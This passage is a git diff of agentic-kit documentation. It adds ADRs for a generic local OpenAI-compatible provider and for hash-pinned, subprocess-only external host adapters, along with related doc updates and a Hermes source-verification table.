+      <li>Subprocess/RPC adapter protocol (sandboxable, language-agnostic) — deferred per ADR-0029 §3 until a second adapter exists to generalize from.</li>
+      <li>Semver stability promise for the adapter contract — a GA-time decision (ADR-0020 companion).</li>
+    </ul>
+  </div>
+
+  <h2 id="hermes">8 · Appendix — Hermes verification summary</h2>
+  <p>
+    Verified against NousResearch/hermes-agent HEAD (v0.20.0, 2026-08-13; the files underlying
+    the claims last changed on or before 2026-08-08, so HEAD matches the ADRs' basis).
+    5 of 7 claim groups confirmed at source level.
+  </p>
+  <div class="tablewrap"><table>
+    <tr><th>Claim group</th><th>Verdict</th><th>Notes</th></tr>
+    <tr><td>Python CLI, pip/uv, no npm</td><td><span class="chip major">partial</span></td><td>Official: correct. But an <b>unofficial npm bridge exists</b> (<code>hermes-agent</code> by wyrtensi, v0.20.0, ships <code>hermes</code>/<code>hermes-agent</code> bins). ADRs must say "no <em>official</em> npm package"; detection must not infer identity/version from npm presence. PyPI carries 0.19.0.</td></tr>
+    <tr><td>YAML config, HERMES_HOME, profiles</td><td><span class="chip major">partial</span></td><td>All confirmed; config actions are a superset (<code>show|edit|get|set|unset|path|env-path|check|migrate</code>). Pointer wrong: dispatcher is <code>cmd_config</code> in <code>hermes_cli/subcommands/config.py</code>, not <code>config_command</code>.</td></tr>
+    <tr><td><code>mcp add</code> EOF-default silent no-op</td><td><span class="chip ok">confirmed</span></td><td>All five sub-claims; stronger than claimed — <b>no</b> <code>hermes mcp</code> subcommand except <code>install</code> can signal failure via exit code (returns swallowed at <code>mcp_config.py:1073</code> → <code>main.py:12872</code>).</td></tr>
+    <tr><td>Oneshot <code>-z</code> behavior</td><td><span class="chip ok">confirmed</span></td><td>YOLO/accept-hooks env, devnull redirect, final-write channel, exit codes 0/1/2 exact, <code>--usage-file</code> on failure too. One correction: <code>--max-turns</code> exists on <code>hermes chat</code> (non-interactive via <code>-q</code>) — just not on <code>-z</code>.</td></tr>
+    <tr><td>Local provider aliases</td><td><span class="chip major">partial</span></td><td><code>ollama</code>/<code>vllm</code>/<code>llamacpp</code> → <code>custom</code>: confirmed (in <code>auth.py</code>, not <code>runtime_provider.py</code>). <b><code>lmstudio</code> is first-class</b> with its own URL normalizer; no <code>mlx</code> alias. And <code>api_mode: openai</code> — as quoted in ADR-0028's reference config — is <b>invalid and silently dropped</b>; the valid value is <code>chat_completions</code> (newer key: <code>transport</code>).</td></tr>
+    <tr><td><code>mcp serve</code> is a messaging bridge</td><td><span class="chip ok">confirmed</span></td><td>Exactly ten tools (<code>conversations_list</code>, <code>messages_send</code>, <code>permissions_respond</code>, …); zero delegation-shaped tools. The reverse-bridge exclusion is the right security call.</td></tr>
+    <tr><td>Docs corroboration</td><td><span class="chip ok">confirmed</span></td><td>Authoritative CLI reference is <code>website/docs/reference/cli-commands.md</code> (not the README). Local-model guides confirm MLX/llama.cpp via custom endpoints.</td></tr>
+  </table></div>
+
+  <div class="callout">
+    <b>Bottom line.</b> The contributor's evidence is accurate where it counts — every claim about
+    ak's internals was confirmed by the surface sweep, and both Hermes safety findings are real.
+    The gap is scope, not honesty: "a loader and two refactors that delete code" is nearer to
+    three blockers, eight majors, twelve test pins, and a docs corpus. Phase 0 is owed today under
+    every posture; the extensibility decision (D-1) is the only call that is genuinely yours alone.
+  </div>
+
+  <p class="footer">
+    Sources: ak surface sweep (file:line citations verified in-repo) · NousResearch/hermes-agent
+    source verification · docs/adr corpus · PR #131 diff. Companion: the PR #131 review response
+    references F-nn / D-n IDs from this document.
+  </p>
+</div>
+</body>
+</html>

--- a/docs/HOST-SUPPORT.md
+++ b/docs/HOST-SUPPORT.md
@@ -1,8 +1,16 @@
 # Host support: Claude Code, Codex, and OpenCode
 
-This is the canonical compatibility reference for the three execution hosts that
-agentic-kit can manage. It compares the host itself, Ruflo, agentic-qe (AQE), and
+This is the canonical compatibility reference for agentic-kit's three **built-in**
+execution hosts. It compares the host itself, Ruflo, agentic-qe (AQE), and
 RuvNet Brain without treating those independent layers as interchangeable.
+
+Behind an experimental flag, agentic-kit can also admit **external host adapters**
+that extend this set with a host not shipped in-tree — see
+[External host adapters](PROVIDERS.md#external-host-adapters-experimental) and
+[ADR-0029](adr/0029-host-adapter-extension-point.md). An admitted external host
+picks up the same capability-driven treatment described here, but it is not one
+of the three built-ins this reference compares, and it can never claim
+primary-host, AQE-provider, or status-line status.
 
 Evidence cutoff: **2026-08-04**. The comparison was checked against agentic-kit
 `4.0.0-alpha.36`, Ruflo `3.34.0`, agentic-qe `3.13.x`, RuvNet Brain `4.0.7`,

--- a/docs/PROVIDERS.md
+++ b/docs/PROVIDERS.md
@@ -47,6 +47,33 @@ checks every binding declared in `kit.json` and prints a warning naming any entr
 unknown host, unknown provider, or unsupported transport — warnings only; nothing is changed
 or removed on your behalf.
 
+## Local OpenAI-compatible servers
+
+Running a local model behind an OpenAI-compatible endpoint — MLX, LM Studio, `llama.cpp`, vLLM —
+rather than Ollama? Declare it as a `local-openai` binding in `kit.json`:
+
+```json
+{
+  "integrations": {
+    "bindings": [
+      {
+        "id": "mlx-via-codex",
+        "host": "codex",
+        "provider": "local-openai",
+        "transport": "openai-compatible",
+        "endpoint": "http://127.0.0.1:8080/v1"
+      }
+    ]
+  }
+}
+```
+
+This gets you a named local inference target with `$0` billing and configured-grade provenance,
+however the endpoint is served. `local-openai` is not an AQE provider type — `ollama` is. Loopback
+`http://` is allowed; a remote endpoint requires `https://`; and the endpoint may never embed
+credentials, fragments, or secret-bearing query parameters. See
+[ADR-0028](adr/0028-local-openai-compatible-providers.md).
+
 ---
 
 ## Level 0 — do nothing (the point)
@@ -340,5 +367,6 @@ just makes the good default automatic and the customization reversible.
   [ADR-0006](adr/0006-primary-host-and-ambidextrous-mirroring.md).
 - Capability-driven integration axes, bindings, and provenance:
   [ADR-0016](adr/0016-capability-driven-integration-adapters.md).
+- The generic local OpenAI-compatible provider: [ADR-0028](adr/0028-local-openai-compatible-providers.md).
 - Host env flags (`ENABLE_CLAUDE_CODE` / `ENABLE_CODEX`): upstream ruflo
   ADR-034, "Optional MCP Backends".

--- a/docs/PROVIDERS.md
+++ b/docs/PROVIDERS.md
@@ -74,6 +74,29 @@ however the endpoint is served. `local-openai` is not an AQE provider type — `
 credentials, fragments, or secret-bearing query parameters. See
 [ADR-0028](adr/0028-local-openai-compatible-providers.md).
 
+## External host adapters (experimental)
+
+Want `ak` to manage a host CLI it doesn't ship in-tree — driving local models through something
+like Hermes, say? Set `AK_EXPERIMENTAL_HOST_ADAPTERS=1` and declare it as **data**, never code:
+
+```json
+{
+  "hostAdapters": [
+    { "name": "hermes", "source": "~/.config/ak/adapters/hermes.json", "contract": 1 }
+  ]
+}
+```
+
+An adapter is a manifest plus a handful of subprocess hooks — nothing an adapter declares ever
+runs inside the `ak` process itself. Registering one asks you to confirm a content hash of the
+manifest; edit the manifest afterward and that consent is invalidated until you confirm again. A
+broken adapter is reported and skipped — it never takes down the hosts that already work.
+
+An external adapter can never claim to be the primary host, an AQE provider, or the status-line
+owner; those stay first-party. Nothing here installs itself: you declare the adapter, you consent
+to it, and teardown remains reversible. See
+[ADR-0029](adr/0029-host-adapter-extension-point.md).
+
 ---
 
 ## Level 0 — do nothing (the point)
@@ -368,5 +391,6 @@ just makes the good default automatic and the customization reversible.
 - Capability-driven integration axes, bindings, and provenance:
   [ADR-0016](adr/0016-capability-driven-integration-adapters.md).
 - The generic local OpenAI-compatible provider: [ADR-0028](adr/0028-local-openai-compatible-providers.md).
+- External host adapters (experimental): [ADR-0029](adr/0029-host-adapter-extension-point.md).
 - Host env flags (`ENABLE_CLAUDE_CODE` / `ENABLE_CODEX`): upstream ruflo
   ADR-034, "Optional MCP Backends".

--- a/docs/TRANSCRIPTS.md
+++ b/docs/TRANSCRIPTS.md
@@ -202,8 +202,7 @@ The file is parsed with `withTurns: true` by the provider's parser
 (`usage-index.mjs:1518-1545`) with the same fields the Sessions view rows
 carry — `prompts`, `responses`, `exceptions`, `sidechain`, `threadSource`,
 `models`, `tools`, `skill`/`plugin`, worktree — plus a `cost` priced from the
-same per-model usage rows `aggregate()` uses (the header used to render a
-hardcoded `$0.00`; the comment at the site records why).
+same per-model usage rows `aggregate()` uses.
 
 ### 4.3 Mask, then truncate — both marked, differently
 
@@ -363,6 +362,11 @@ was wrong before, for the curious.
 - **Session expander fields shipped but unrendered.** The per-session fields
   §6.1's expander now renders (classification `basis` + confidence, the
   token split, flags) once travelled on the wire and rendered nowhere.
+- **Transcript header once showed a hardcoded `$0.00`.** `readSession`'s
+  assembled `meta` left `cost` undefined, and `fmtUsd(undefined)` renders the
+  truthy string `"$0.00"` — a fixed-looking zero on a panel whose whole
+  subject is cost. `meta.cost` is now priced via `sessionCost()` from the
+  same per-model usage rows `aggregate()` uses (`usage-index.mjs:1538-1542`).
 - **Aggregate-side incidents** (the v4/v5 cache bumps, the Codex parsing
   defects) are recorded in `USAGE-SCORECARD-METRICS.md` Appendix A.
 

--- a/docs/adr/0016-capability-driven-integration-adapters.md
+++ b/docs/adr/0016-capability-driven-integration-adapters.md
@@ -1,9 +1,10 @@
 # ADR-0016 — Capability-driven host, provider, binding, projection, and observability adapters
 
 - **Status:** Accepted; compatibility clauses superseded by
-  [ADR-0020](0020-ga-stable-surfaces.md)
+  [ADR-0020](0020-ga-stable-surfaces.md); closed-registry clause superseded by
+  [ADR-0029](0029-host-adapter-extension-point.md)
 - **Date:** 2026-07-28
-- **Updated:** 2026-08-14
+- **Updated:** 2026-08-15
 - **Update note:** Added read-only Codex plugin-hook compatibility facts,
   runtime-selected Ruflo project-memory store proofs, and the non-correlatable
   OpenRouter account-analytics boundary; removed the pre-GA compatibility command,
@@ -18,6 +19,12 @@
   warnings (F-16); and the integrations migrator derives each host's native
   default provider from the provider registry's host-login entries instead of a
   literal map, inferring no binding at all for hosts without one (F-13).
+  2026-08-15: [ADR-0029](0029-host-adapter-extension-point.md) supersedes §1's
+  closed-registry requirement — the registry admits an explicitly registered,
+  hash-pinned, subprocess-only external host adapter behind an experimental
+  flag; every other property that clause protected (zero-runtime-dependency,
+  offline-first normal operation, no in-process third-party code) remains
+  intact.
 - **Deciders:** agentic-kit maintainers
 - **Related:** [ADR-0001](0001-one-routing-policy-many-projections.md),
   [ADR-0003](0003-auto-seed-dual-host-provenance.md),

--- a/docs/adr/0028-local-openai-compatible-providers.md
+++ b/docs/adr/0028-local-openai-compatible-providers.md
@@ -1,0 +1,178 @@
+# ADR-0028 — One generic local OpenAI-compatible provider, not a vendor enumeration
+
+- **Status:** Accepted
+- **Date:** 2026-08-11
+- **Updated:** 2026-08-14
+- **Update note:** Accepted with corrections after review of PR #131: the quoted Hermes
+  `api_mode: openai` value is annotated as invalid rather than reproduced as valid (F-30), and the
+  AQE-projection asymmetry between `ollama` and `local-openai` is now stated explicitly as
+  intentional (F-29). Implemented with in-tree projections `['ruflo', 'codex', 'opencode']`.
+- **Deciders:** agentic-kit maintainers
+- **Related:** [ADR-0011](0011-local-model-provenance-zero-cost-and-transcript-fidelity.md),
+  [ADR-0016](0016-capability-driven-integration-adapters.md),
+  [ADR-0021](0021-inference-provider-provenance.md)
+
+Proposed by [@adrianco](https://github.com/adrianco) in
+[PR #131](https://github.com/pacphi/agentic-kit/pull/131); accepted with the corrections recorded
+below.
+
+## Context
+
+[ADR-0016](0016-capability-driven-integration-adapters.md) separates inference **providers** from
+execution **hosts**, and [ADR-0011](0011-local-model-provenance-zero-cost-and-transcript-fidelity.md)
+governs what a local provider may claim. The provider registry declared exactly **one** local
+provider — `ollama` — and `BUILTIN_BINDINGS` carried exactly two local bindings,
+`ollama-via-claude` and `ollama-via-codex` (`src/lib/adapters/registries.mjs`,
+`src/lib/adapters/bindings.mjs`).
+
+Ollama is not the only way a local model is served, and on real machines it is frequently not the
+one in use. A local inference server is normally reached as an **OpenAI-compatible HTTP endpoint on
+loopback**: MLX/`mlx_lm.server`, LM Studio, `llama.cpp`'s server, and vLLM all present that shape.
+Nothing in ak could name such an endpoint as a provider, so a machine running one had its local
+inference either invisible or misfiled.
+
+This was observed on the proposer's reference machine. `~/.hermes/config.yaml` declared:
+
+```yaml
+provider: mlxlocal
+providers:
+  mlxlocal:
+    api: http://127.0.0.1:8080/v1
+    api_mode: openai
+    default_model: mlx-community--Qwen3-Coder-Next-4bit
+```
+
+`api_mode: openai` is not a valid Hermes value — verified against `NousResearch/hermes-agent`
+v0.20.0's `_parse_api_mode`, which silently **drops** an unrecognized value rather than raising.
+The valid set is `{chat_completions, codex_responses, anthropic_messages, bedrock_converse,
+codex_app_server}` (the newer key spelling is `transport`); `chat_completions` is the correct value
+here, and it is also the default the parser falls back to, which is why the endpoint worked despite
+the invalid setting. The quote above is reproduced verbatim because it is what the proposer's
+machine observed — but `api_mode: openai` is not read as valid Hermes configuration by this ADR.
+
+Two facts survive that correction. First, the endpoint is a plain OpenAI-compatible loopback URL —
+the generic shape, not a vendor-specific protocol. Second, **the provider name is user-chosen**
+(`mlxlocal`). No enumeration of vendor ids can cover that case; a registry that lists `mlx`,
+`lmstudio`, `llamacpp`, and `vllm` still has no row for `mlxlocal`.
+
+The binding machinery already accommodates this. `validateEndpoint` accepts loopback `http://`
+while rejecting remote `http://`, embedded credentials, fragments, and secret-bearing query
+parameters (`src/lib/adapters/config.mjs`). `http://127.0.0.1:8080/v1` was already a legal binding
+endpoint; only the provider row was missing.
+
+## Decision
+
+### 1. Add one generic provider row: `local-openai`
+
+A single provider represents "an OpenAI-compatible model server the user runs locally", regardless
+of which program serves it:
+
+- `billing: 'local'`, `credentials: { kind: 'none' }`, `capabilities.pricing: 'zero'` — required by
+  the registry's own construction invariants for a local provider (`validateRegistries`), and
+  correct: a loopback server bills nothing. A server that wants a placeholder token does not make
+  the credential *required*, so `kind: 'none'` remains accurate.
+- `transports: ['openai-compatible']` — the only transport the row may claim. Anthropic-compatible
+  and native shells stay Ollama's, established separately.
+- `capabilities.modelDiscovery: false`, `runtimeDiscovery: false`, `quota: false`,
+  `cacheAccounting: 'unknown'`. A generic endpoint exposes no catalogue ak may rely on. Claiming
+  `/v1/models` discovery would assert a uniformity across MLX, LM Studio, llama.cpp, and vLLM this
+  ADR has not measured.
+- `observability: []`. Ollama keeps `ollama-catalog` / `ollama-runtime`; the generic row gets
+  neither, because it has no daemon API ak has verified.
+
+`ollama` is unchanged. It keeps its richer transports and its two observability sources precisely
+because those rest on a specific, known daemon.
+
+### 2. The endpoint carries the identity; the provider row does not
+
+Which program serves a `local-openai` binding is recorded as the **binding's** endpoint and model,
+not as provider identity. A user running MLX on `:8080` and LM Studio on `:1234` has two bindings
+against one provider — the same relation ADR-0011 already names for `ollama-via-claude` /
+`ollama-via-codex`, one level more general.
+
+Consistent with [ADR-0021](0021-inference-provider-provenance.md), such a binding establishes
+**configured** provenance and nothing stronger. The endpoint is user-declared, so it may not be
+displayed as observed, and it does not upgrade model, token, cache, or digest claims. The `$0`
+claim is the one exception and is a property of the billing type, not of evidence about the run.
+
+### 3. No built-in bindings for the generic provider
+
+`BUILTIN_BINDINGS` gains nothing here. Ollama's two rows are justified by a fixed, well-known
+default port; a generic local endpoint has no default ak may presume. Bindings are declared by the
+user in `kit.json` and validated by the existing `assertValidBinding` path. "Local" is a billing
+claim (user-run, `$0` — ADR-0011), not a topology constraint: a binding may name a user-run server
+on another machine over `https`, while plain `http` remains loopback-only per `validateEndpoint`.
+
+### 4. Replace the derived capability block with per-entry data
+
+`providerEntries` previously derived capabilities from identity comparisons inside a `.map`
+(`modelDiscovery: id === 'ollama'`, `pricing: id === 'ollama' ? 'zero' : …`). That construction does
+not survive a second local provider: `local-openai` needs `pricing: 'zero'` without
+`modelDiscovery`, which the `id === 'ollama'` coupling cannot express. Provider entries become
+explicit records carrying their own capability block, matching how `hostEntries` is already
+written.
+
+### 5. `local-openai` projects to `['ruflo', 'codex', 'opencode']`, and is not an AQE provider type
+
+The in-tree row declares projections `['ruflo', 'codex', 'opencode']`. Two omissions, both
+deliberate:
+
+- **No `'claude'` projection.** The row claims only the OpenAI-compatible transport; Claude's
+  projection expects an anthropic-compatible surface, which is Ollama's arrangement, not this
+  provider's.
+- **No `'aqe'` projection — `local-openai` is not an AQE provider type; `ollama` is.** AQE's
+  provider set is upstream's own enumeration (`ollama`, `onnx` are its local types), not something
+  ak may extend by adding a row to its own registry. Projecting `local-openai` into AQE would
+  fabricate a provider identity AQE has never declared it understands. This is an intentional
+  asymmetry, not a bug: `ollama` gets AQE projection because AQE names it; `local-openai` does not,
+  because AQE does not. `ak status`'s provider surface reflects this distinction; surfacing it
+  clearly is a sibling work package's scope, not this ADR's.
+
+## Consequences
+
+- A machine serving models from MLX, LM Studio, llama.cpp, vLLM, or anything else speaking
+  OpenAI-compatible HTTP on loopback can be described to ak without a new ADR per vendor, and
+  without inventing a provider id the user did not choose.
+- Every host that can be pointed at an OpenAI-compatible base URL gains a nameable local provider.
+- The generic row deliberately supports **less** than `ollama`: no catalogue, no runtime probe, no
+  digest. Surfaces that show local-model detail for Ollama will show less for `local-openai`, and
+  that gap is the honest reading of the evidence, not a defect to paper over.
+- `local-openai` is not an AQE provider type and is not projected as one. AQE's own local routing
+  (`ollama`, `onnx`) is a separate axis, defined upstream, and untouched by this ADR.
+
+## Alternatives considered
+
+- **Named rows per runtime (`mlx`, `lmstudio`, `llamacpp`, `vllm`).** Rejected for this revision on
+  two grounds. It cannot cover a user-named provider such as the observed `mlxlocal`, so the
+  generic row is required regardless and the named rows would be additive decoration. And each row
+  would assert transport and discovery facts for a server this repository has not measured —
+  precisely the derivation-without-measurement that
+  [docs/LOCAL-MODEL-VALIDATION.md](../LOCAL-MODEL-VALIDATION.md) exists to correct. Named rows
+  remain available later, gated on an evidence pass of the same kind, and would then be able to
+  claim real `/v1/models` discovery instead of guessing at it.
+- **Extend `ollama` to mean "any local server".** Rejected: it would make an established provider
+  id lie about which daemon is answering, and `ollama-catalog` / `ollama-runtime` would be attached
+  to endpoints that serve neither.
+- **Infer the runtime by probing the endpoint.** Rejected as a default: ak would be spawning
+  network probes during status collection to manufacture an identity claim that ADR-0021 would then
+  have to grade as inferred anyway. The user naming their own binding is cheaper and more honest.
+
+## References
+
+- `src/lib/adapters/registries.mjs` (`providerEntries`, `validateProviderAdapter`,
+  `validateRegistries` local-billing invariants), `src/lib/adapters/bindings.mjs`
+  (`BUILTIN_BINDINGS`, `assertValidBinding`), `src/lib/adapters/config.mjs` (`validateEndpoint`
+  loopback rule).
+- ADR-0011 (local-model provenance, `$0`, transcript fidelity), ADR-0016 (provider/binding
+  separation), ADR-0021 (provenance is carried, never upgraded).
+- Observed local configuration: `~/.hermes/config.yaml` on the proposer's reference machine
+  (`api: http://127.0.0.1:8080/v1`); the file's `api_mode: openai` is not a valid Hermes value (see
+  Context) and is not cited as correct usage.
+- Hermes source verified for the `api_mode` correction: `NousResearch/hermes-agent` v0.20.0,
+  `_parse_api_mode`.
+- [PR #131](https://github.com/pacphi/agentic-kit/pull/131) — original proposal, including
+  companion proposals for a host-adapter extension point (that PR's ADR-0029) and a Hermes reference
+  adapter (that PR's ADR-0030), neither adopted into this repository by this ADR.
+- Tests: `tests/kit/adapter-registries.test.mjs` (deep-equality pin for the five pre-existing
+  providers, registry invariants for a second local provider, binding validation against a
+  loopback OpenAI-compatible endpoint).

--- a/docs/adr/0029-host-adapter-extension-point.md
+++ b/docs/adr/0029-host-adapter-extension-point.md
@@ -2,6 +2,13 @@
 
 - **Status:** Accepted (experimental contract)
 - **Date:** 2026-08-15
+- **Updated:** 2026-08-16
+- **Update note:** [ADR-0031](0031-capability-graduation-and-upstream-requests.md) amends this ADR's
+  "permanent caps" framing. The block on *self-declaring* `canBePrimary` / `aqeProvider` /
+  `commandStatusline` in the manifest is permanent (the safety invariant here), but the *capability*
+  is earnable through a conformance tier plus a maintainer grant recorded outside the manifest — up
+  to promotion to a first-party built-in. The schema, admission gate, consent model, and hook runner
+  in this ADR are unchanged.
 - **Deciders:** agentic-kit maintainers
 - **Related:** [ADR-0016](0016-capability-driven-integration-adapters.md) (closed-registry clause
   superseded — see [Supersession](#supersession-of-adr-0016s-closed-registry-clause)),

--- a/docs/adr/0029-host-adapter-extension-point.md
+++ b/docs/adr/0029-host-adapter-extension-point.md
@@ -1,0 +1,366 @@
+# ADR-0029 — External host adapters: declarative manifest, subprocess hooks (experimental contract)
+
+- **Status:** Accepted (experimental contract)
+- **Date:** 2026-08-15
+- **Deciders:** agentic-kit maintainers
+- **Related:** [ADR-0016](0016-capability-driven-integration-adapters.md) (closed-registry clause
+  superseded — see [Supersession](#supersession-of-adr-0016s-closed-registry-clause)),
+  [ADR-0017](0017-opencode-host.md), [ADR-0018](0018-generalized-host-worker-execution.md),
+  [ADR-0019](0019-escalation-in-ak-run.md),
+  [ADR-0023](0023-fail-closed-operations-and-explicit-degradation.md),
+  [ADR-0028](0028-local-openai-compatible-providers.md)
+
+Proposed by [@adrianco](https://github.com/adrianco) in
+[PR #131](https://github.com/pacphi/agentic-kit/pull/131), as an in-process ESM module — one
+manifest export, dynamically `import()`-ed from a package path named in `kit.json`, validated by
+the same validators as a built-in host. **Accepted with a different mechanism**, recorded below,
+after maintainer review found that shape's in-tree gate list materially incomplete and its
+underlying safety premise unmet.
+
+## Context
+
+[ADR-0016](0016-capability-driven-integration-adapters.md) deliberately built a **closed** registry:
+"a closed, validated registry of built-in code, not an arbitrary third-party plugin runtime." Every
+host added since — OpenCode in [ADR-0017](0017-opencode-host.md) — paid that cost in full: a
+dedicated owner module, native surfaces reverse-engineered from scratch, and edits across roughly a
+dozen files and eight test suites.
+
+PR #131 named the fourth-host problem this creates: a new host is a **permanent obligation of
+whoever maintains agentic-kit**, including a CLI they may not run, cannot easily verify, and did not
+choose. Its own `docs/HOST-ADAPTER-EXTENSION-PROPOSAL.md` observed, correctly, that ADR-0016's own
+contracts — `validateHostAdapter`, `validateLifecycleAdapter`'s five-verb
+detect/plan/apply/verify/undo cycle, ownership receipts, `validateExecutionAdapter`,
+`normalizedFacts` — are already host-agnostic and already partly proven: `OPENCODE_LIFECYCLE_ADAPTER`
+is driven through the fully generic `runLifecycle`, not opencode-specific dispatch. The proposal's
+central claim was that publishing that seam is a small last mile, not a new subsystem.
+
+The maintainer's review of PR #131 (posted to the PR, quoted throughout this ADR) verified that
+claim on the ak side — "adapter selection is indeed a named import at the five call sites,"
+`status.mjs`'s hand-rolled opencode block and unguarded `npmRoot` call are as described, and the
+validators are genuinely host-agnostic (a synthetic `grok` host is already exercised end-to-end
+through setup disclosure in `trust-manifest.test.mjs:47-69`). It also found the in-tree gate list the
+PR offered materially incomplete, and directed that any accepted design carry the honest full list
+rather than the honest case-against alone. Both findings are the direct inputs to this ADR.
+
+## Why the mechanism changed
+
+PR #131's proposal was an **in-process** extension: a third party's ESM module, loaded by `import()`
+and executed inside the same process as `ak` itself, gated only by explicit registration,
+capability-cap fields in its declared manifest, and disclosure before mutation. Those three
+constraints are real, but they only make untrusted in-process code *visible* — none of them make it
+*safe*, and the evidence gathered in reviewing this proposal argues the gap is not closable by
+adding more constraints of the same kind:
+
+1. **No host CLI ak already integrates or evaluated sandboxes or verifies extension code before
+   running it.** [ADR-0018](0018-generalized-host-worker-execution.md)'s own trust-boundary section
+   already states this of `ak run`'s built-in workers: a hostile repository's `opencode.json` or
+   `.claude/settings.json` pre-approves permissions and "no `permission.updated` event ever fires,
+   so the adapter's abort boundary does not trip by design — the abort covers permission
+   *requests*; it is not a sandbox." The PR #131 review independently confirmed the same shape at
+   the fourth host: Hermes's headless `-z` mode sets `HERMES_YOLO_MODE=1` by its own documented
+   contract, so there is no permission event to intercept and no `permission_required` result to
+   return at all. Four hosts surveyed, zero that isolate extension code from the process trusting
+   it — that is a precedent for the opposite of a fifth precedent, not for one.
+2. **A typed capability cap is not the same thing as an enforced one, and this repository already
+   has the near-miss on record.** The review's own item 6 (§ "The amended gate list" below) found
+   that `src/lib/execution/adapters.mjs`'s routable-host invariant threw at **import time** for a
+   registry-only change — a schema-correct, fully first-party host flip could have bricked `ak run`
+   for every consumer before the corresponding execution adapter shipped. If a typed invariant on
+   ak's own built-in registry needed a maintainer's line-by-line review to catch, the same class of
+   cap expressed as a boolean field in a third party's manifest — `canBePrimary: false`,
+   self-declared, in code that party also controls — is not a safe place to put the only enforcement
+   of "this adapter may never become primary." A capability cap is only as strong as the code that
+   is *unable* to ignore it, and in-process code sharing ak's own call stack is never in that
+   position by construction.
+3. **The integrity primitives this contract adopts instead already exist, tested, in the tools this
+   review examined.** Codex CLI's trust model for a registered MCP server pins a content hash at
+   approval time and invalidates that approval the instant the pinned content changes — never
+   re-approving silently on drift. Hermes draws the same line one level lower: interactive
+   `mcp add` requires an explicit confirmation before registering a server, contrasted directly
+   against `-z`'s blanket, event-free auto-approval the review flagged as the honest-disclosure
+   case in ADR-0030's own posture. Both are **consent gates outside the code being trusted**, not
+   capability fields inside it. That is the shape this ADR adopts: hash-pinned consent on a
+   manifest, invalidated the instant the manifest's content changes, enforced by `ak`'s own loader —
+   never by the adapter's own declaration.
+
+The accepted mechanism is therefore: **a declarative manifest, driving a fixed set of consented
+subprocess hooks. No third-party code ever executes inside the `ak` process.** Everything the
+manifest can express is data; everything the adapter *does* happens in a spawned process ak owns
+the lifecycle of, exactly the way ADR-0016 §3 already bounds built-in projection network/process
+probes and ADR-0018 already bounds worker subprocess termination proof.
+
+## Decision
+
+### 1. The manifest (contract: 1)
+
+`kit.json` gains a `hostAdapters` array. Each entry names a manifest file, never a module:
+
+```json
+{
+  "hostAdapters": [
+    {
+      "name": "hermes",
+      "source": "~/.config/ak/adapters/hermes.json",
+      "contract": 1
+    }
+  ]
+}
+```
+
+The manifest itself is JSON: a host descriptor and capability block shaped like `HostAdapter` in
+ADR-0016 §1 (minus the three fields capped in §3 below), plus a `hooks` block. Each hook names one
+lifecycle or execution verb (`detect`, `plan`, `apply`, `verify`, `undo`, and the execution-adapter
+methods when `capabilities.activityRouting` is declared) and the subprocess command that implements
+it. There is no function-valued field anywhere in the manifest — every value is JSON-serializable,
+which is itself part of the safety property: a manifest that cannot express a closure cannot smuggle
+one in.
+
+### 2. Driving-surface vocabulary: `cli-subprocess` / `acp` / `mcp`
+
+Every declared hook names the driving surface that invokes it. Contract v1 recognizes three surface
+names:
+
+- **`cli-subprocess`** — spawn the declared binary/script as a subprocess, apply the same bounded
+  timeout and honest-unreachable discipline ADR-0016 §3 already requires of built-in projection
+  probes, and read back either a structured JSON result (the `normalizedFacts`/`WorkerResult` shape)
+  or a plain-text summary capture (the generic sibling of `createJsonlSummaryCapture`, needed for a
+  host like Hermes that has no structured run mode). This is the **only surface with a working
+  implementation in this wave.**
+- **`acp`** — Agent Client Protocol invocation. Named for forward compatibility with driving
+  surfaces this contract anticipates but has not built.
+- **`mcp`** — Model Context Protocol tool call, the same shape this session's own Claude↔Codex
+  bridge uses to drive one host from another. Also named, also not implemented.
+
+An adapter manifest declaring `acp` or `mcp` today fails admission with an explicit "surface not yet
+supported" diagnostic. It is never silently downgraded to `cli-subprocess` — a silent downgrade
+would run a hook the adapter author never tested against that surface, exactly the kind of guessed
+success ADR-0016 §5 and ADR-0023 already forbid elsewhere.
+
+### 3. Capability caps are schema-structural, not runtime-checked
+
+`canBePrimary`, `aqeProvider`, and `commandStatusline` are not fields the external-adapter manifest
+schema accepts, at any value. An adapter author cannot express the claim "I am primary-eligible" —
+not because `ak` reads and rejects `true`, but because the accepted JSON Schema has no place to put
+it. This is the direct fix for the gap identified in "Why the mechanism changed" above: a capability
+cap enforced by field-absence cannot be bypassed by anything the adapter's own code does, because
+there is no code — only a document a schema either accepts or rejects before anything runs.
+`canRouteActivities` remains expressible; it is the one capability an external adapter may claim,
+matching the shape OpenCode already occupies as a non-primary, non-AQE, routable host.
+
+### 4. Admission: fail-closed, per-adapter isolated, behind an experimental flag
+
+The entire surface is inert unless `AK_EXPERIMENTAL_HOST_ADAPTERS=1` is set in the environment. With
+the flag unset, a `hostAdapters` entry in `kit.json` is parsed and preserved (never silently
+dropped) but never admitted — `ak` reports it present-but-inactive rather than pretending it does
+not exist.
+
+With the flag set, admission of each declared adapter is independent:
+
+- schema validation of the manifest, hash verification against the persisted `trust.hash`, and
+  hook-surface support are all checked before any hook of that adapter ever runs;
+- a failure at any of those steps is reported and that one adapter is skipped — it never brings down
+  `ak status`, `ak sync`, or any built-in host's handling;
+- first-party registries keep throwing at construction. A broken built-in is a build error; a broken
+  external adapter is a diagnosed, isolated fact, per ADR-0023's fail-closed-and-explicit posture
+  applied to a source ak did not author.
+
+### 5. The admitted overlay
+
+An admitted external host is exposed through an overlay alongside `HOST_REGISTRY`, never by
+mutating the frozen built-in registry itself — the same non-negotiable ADR-0016 §1 drew around
+compatibility exports ("derived… but not independent sources of truth"), generalized to a second,
+explicitly consented source instead of legacy-compat alone. Every consumer that already derives its
+behavior from capability lookups over the registry (ADR-0016 §2: host selection, primary-host
+eligibility, activity routing, install/MCP/guidance/status-line/transcript/usage work, verification)
+picks up an admitted host automatically, with no adapter-specific branch to add. An admitted host is
+invisible as a special case to any consumer that was already capability-driven — and visible only
+where a consumer still hardcodes `claude`/`codex`/`opencode` by name. That residue is exactly the
+amended gate list below.
+
+### 6. Consent: hash-pinned, edit-invalidated
+
+Registering an adapter computes a content hash over the manifest and every declared subprocess hook
+command, discloses the full manifest through the same trust-manifest surface ADR-0018/ADR-0023
+already use before any other mutation, and requires explicit confirmation before persisting
+`trust.hash` and `trust.consentedAt`. Every subsequent load re-hashes the manifest and compares: a
+mismatch means the manifest changed since consent, and the adapter is **not admitted** until
+re-consented. This is Codex's pin-and-invalidate model, applied to `ak`'s own adapter manifests
